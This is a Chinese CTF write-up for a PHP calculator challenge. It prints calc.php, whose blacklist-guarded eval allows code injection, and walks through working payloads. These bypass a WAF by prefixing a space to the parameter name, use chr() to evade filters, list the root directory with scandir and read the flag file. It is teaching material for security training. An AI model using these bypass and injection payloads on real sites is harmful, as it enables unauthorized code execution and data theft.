f12找到一段ajax请求代码
$('#calc').submit(function(){
$.ajax({
url:"calc.php?num="+encodeURIComponent($("#content").val()),
type:'GET',
success:function(data){
$("#result").html(`<div class="alert alert-success">
<strong>答案:</strong>${data}
</div>`);
},
error:function(){
alert("这啥?算不来!");
}
})
return false;
})
进入calc.php
<?php
error_reporting(0);
if(!isset($_GET['num'])){
show_source(__FILE__);
}else{
$str = $_GET['num'];
$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
foreach ($blacklist as $blackitem) {
if (preg_match('/' . $blackitem . '/m', $str)) {
die("what are you want to do?");
}
}
eval('echo '.$str.';');
}
?>
关键点在eval函数这里,明显是代码执行。
我本以为这就是题目中所说的waf,结果输了字母也被禁掉了。
看来还有防护手段。这题使用率php字符串解析特性。
什么是字符串解析特性呢:
PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:
1.删除空白符
2.将某些字符转换为下划线(包括空格)【当waf不让你过的时候,php却可以让你过】
所以说我们将变量num改为 num(在前面加了个空格),waf认为这俩不是一个变量,不会对其进行防护,
但是后台php在解析的时候,会先去掉空格,这样我们的php代码就能够执行了。
? num=phpinfo()
绕waf成功。
接下来就是绕这个后台检测了。先列一下根目录吧,flag一般都放在根目录。
? num=1;var_dump(scandir(chr(47)))
chr(47)绕过'/'检测。
目录是f1agg不是flagg,做题可要看清楚1和l。
? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
最后得到flag